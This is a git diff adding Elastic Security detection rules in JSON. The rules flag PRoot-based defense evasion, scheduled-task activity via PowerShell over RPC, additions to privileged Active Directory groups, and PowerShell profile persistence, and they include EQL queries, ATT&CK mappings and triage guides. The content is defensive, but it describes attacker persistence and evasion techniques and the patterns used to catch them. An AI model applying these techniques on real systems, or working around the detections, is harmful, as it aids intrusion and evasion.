a/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_7.json b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_7.json new file mode 100644 index 00000000000..2283089cbe2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_7.json @@ -0,0 +1,82 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the PRoot utility, an open-source tool for user-space implementation of chroot, mount --bind, and binfmt_misc. Adversaries can leverage an open-source tool PRoot to expand the scope of their operations to multiple Linux distributions and simplify their necessary efforts. In a normal threat scenario, the scope of an attack is limited by the varying configurations of each Linux distribution. With PRoot, it provides an attacker with a consistent operational environment across different Linux distributions, such as Ubuntu, Fedora, and Alpine. PRoot also provides emulation capabilities that allow for malware built on other architectures, such as ARM, to be run.The post-exploitation technique called bring your own filesystem (BYOF), can be used by the threat actors to execute malicious payload or elevate privileges or perform network scans or orchestrate another attack on the environment. Although PRoot was originally not developed with malicious intent it can be easily tuned to work for one.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Defense Evasion via PRoot", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.parent.name == \"proot\"\n", + "references": [ + "https://proot-me.github.io/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5c9ec990-37fa-4d5c-abfc-8d432f3dedd0", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1211", + "name": "Exploitation for Defense Evasion", + "reference": "https://attack.mitre.org/techniques/T1211/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_106.json b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_106.json new file mode 100644 index 00000000000..61107459864 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_106.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the PowerShell process loading the Task Scheduler COM DLL followed by an outbound RPC network connection within a short time period. This may indicate lateral movement or remote discovery via scheduled tasks.", + "false_positives": [ + "Legitimate scheduled tasks may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Outbound Scheduled Task Activity via PowerShell", + "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\") and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [network where host.os.type == \"windows\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and destination.port == 135 and not destination.ip in (\"127.0.0.1\", \"::1\")]\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5cd55388-a19c-47c7-8ec4-f41656c2fded", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + }, + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "5cd55388-a19c-47c7-8ec4-f41656c2fded_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_107.json b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_107.json new file mode 100644 index 00000000000..5394e915bf5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_107.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the PowerShell process loading the Task Scheduler COM DLL followed by an outbound RPC network connection within a short time period. This may indicate lateral movement or remote discovery via scheduled tasks.", + "false_positives": [ + "Legitimate scheduled tasks may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Outbound Scheduled Task Activity via PowerShell", + "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\") and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [network where host.os.type == \"windows\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and destination.port == 135 and not destination.address in (\"127.0.0.1\", \"::1\")]\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.address", + "type": "keyword" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5cd55388-a19c-47c7-8ec4-f41656c2fded", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + }, + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "5cd55388-a19c-47c7-8ec4-f41656c2fded_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_109.json b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_109.json new file mode 100644 index 00000000000..ca1197a0ffc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_109.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Skoetting" + ], + "description": "Identifies a user being added to a privileged group in Active Directory. Privileged accounts and groups in Active Directory are those to which powerful rights, privileges, and permissions are granted that allow them to perform nearly any action in Active Directory and on domain-joined systems.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "User Added to Privileged Group", + "note": "## Triage and analysis\n\n### Investigating User Added to Privileged Group in Active Directory\n\nPrivileged accounts and groups in Active Directory are those to which powerful rights, privileges, and permissions are granted that allow them to perform nearly any action in Active Directory and on domain-joined systems.\n\nAttackers can add users to privileged groups to maintain a level of access if their other privileged accounts are uncovered by the security team. This allows them to keep operating after the security team discovers abused accounts.\n\nThis rule monitors events related to a user being added to a privileged group.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should manage members of this group.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This attack abuses a legitimate Active Directory mechanism, so it is important to determine whether the activity is legitimate, if the administrator is authorized to perform this operation, and if there is a need to grant the account this level of privilege.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the admin is not aware of the operation, activate your Active Directory incident response plan.\n- If the user does not need the administrator privileges, remove the account from the privileged group.\n- Review the privileges of the administrator account that performed the action.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "iam where winlog.api:\"wineventlog\" and event.action == \"added-member-to-group\" and\n group.name : (\"Admin*\",\n \"Local Administrators\",\n \"Domain Admins\",\n \"Enterprise Admins\",\n \"Backup Admins\",\n \"Schema Admins\",\n \"DnsAdmins\",\n \"Exchange Organization Administrators\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "group.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.api", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_8.json b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_8.json new file mode 100644 index 00000000000..3617915eacf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_8.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a PowerShell profile. PowerShell profile is a script that is executed when PowerShell starts to customize the user environment, which can be abused by attackers to persist in a environment where PowerShell is common.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via PowerShell profile", + "note": "## Triage and analysis\n\n### Investigating Persistence via PowerShell profile\n\nPowerShell profiles are scripts executed when PowerShell starts, customizing the user environment. They are commonly used in Windows environments for legitimate purposes, such as setting variables or loading modules. However, adversaries can abuse PowerShell profiles to establish persistence by inserting malicious code that executes each time PowerShell is launched.\n\nThis rule identifies the creation or modification of a PowerShell profile. It does this by monitoring file events on Windows systems, specifically targeting profile-related file paths and names, such as `profile.ps1` and `Microsoft.Powershell_profile.ps1`. By detecting these activities, security analysts can investigate potential abuse of PowerShell profiles for malicious persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Retrive and inspect the PowerShell profile content; look for suspicious DLL imports, collection or persistence capabilities, suspicious functions, encoded or compressed data, suspicious commands, and other potentially malicious characteristics.\n- Identify the process responsible for the PowerShell profile creation/modification. Use the Elastic Defend events to examine all the activity of the subject process by filtering by the process's `process.entity_id`.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check for additional PowerShell and command-line logs that indicate that any suspicious command or function were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This is a dual-use mechanism, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the script doesn't contain malicious functions or potential for abuse, no other suspicious activity was identified, and the user has business justifications to use PowerShell.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n - Consider enabling and collecting PowerShell logs such as transcription, module, and script block logging, to improve visibility into PowerShell activities.\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : (\"?:\\\\Users\\\\*\\\\Documents\\\\WindowsPowerShell\\\\*\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\PowerShell\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\*\") and\n file.name : (\"profile.ps1\", \"Microsoft.Powershell_profile.ps1\")\n", + "references": [ + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles", + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5cf6397e-eb91-4f31-8951-9f0eaa755a31", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.013", + "name": "PowerShell Profile", + "reference": "https://attack.mitre.org/techniques/T1546/013/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.013", + "name": "PowerShell Profile", + "reference": "https://attack.mitre.org/techniques/T1546/013/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "5cf6397e-eb91-4f31-8951-9f0eaa755a31_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_9.json b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_9.json new file mode 100644 index 00000000000..752e1d7dca7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_9.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a PowerShell profile. PowerShell profile is a script that is executed when PowerShell starts to customize the user environment, which can be abused by attackers to persist in a environment where PowerShell is common.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via PowerShell profile", + "note": "## Triage and analysis\n\n### Investigating Persistence via PowerShell profile\n\nPowerShell profiles are scripts executed when PowerShell starts, customizing the user environment. They are commonly used in Windows environments for legitimate purposes, such as setting variables or loading modules. However, adversaries can abuse PowerShell profiles to establish persistence by inserting malicious code that executes each time PowerShell is launched.\n\nThis rule identifies the creation or modification of a PowerShell profile. It does this by monitoring file events on Windows systems, specifically targeting profile-related file paths and names, such as `profile.ps1` and `Microsoft.Powershell_profile.ps1`. By detecting these activities, security analysts can investigate potential abuse of PowerShell profiles for malicious persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Retrive and inspect the PowerShell profile content; look for suspicious DLL imports, collection or persistence capabilities, suspicious functions, encoded or compressed data, suspicious commands, and other potentially malicious characteristics.\n- Identify the process responsible for the PowerShell profile creation/modification. Use the Elastic Defend events to examine all the activity of the subject process by filtering by the process's `process.entity_id`.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check for additional PowerShell and command-line logs that indicate that any suspicious command or function were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This is a dual-use mechanism, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the script doesn't contain malicious functions or potential for abuse, no other suspicious activity was identified, and the user has business justifications to use PowerShell.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n - Consider enabling and collecting PowerShell logs such as transcription, module, and script block logging, to improve visibility into PowerShell activities.\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : (\"?:\\\\Users\\\\*\\\\Documents\\\\WindowsPowerShell\\\\*\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\PowerShell\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\*\") and\n file.name : (\"profile.ps1\", \"Microsoft.Powershell_profile.ps1\")\n", + "references": [ + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles", + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5cf6397e-eb91-4f31-8951-9f0eaa755a31", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.013", + "name": "PowerShell Profile", + "reference": "https://attack.mitre.org/techniques/T1546/013/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.013", + "name": "PowerShell Profile", + "reference": "https://attack.mitre.org/techniques/T1546/013/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 9 + }, + "id": "5cf6397e-eb91-4f31-8951-9f0eaa755a31_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_107.json b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_107.json new file mode 100644 index 00000000000..0bdc3d4cba8 --- /dev/null 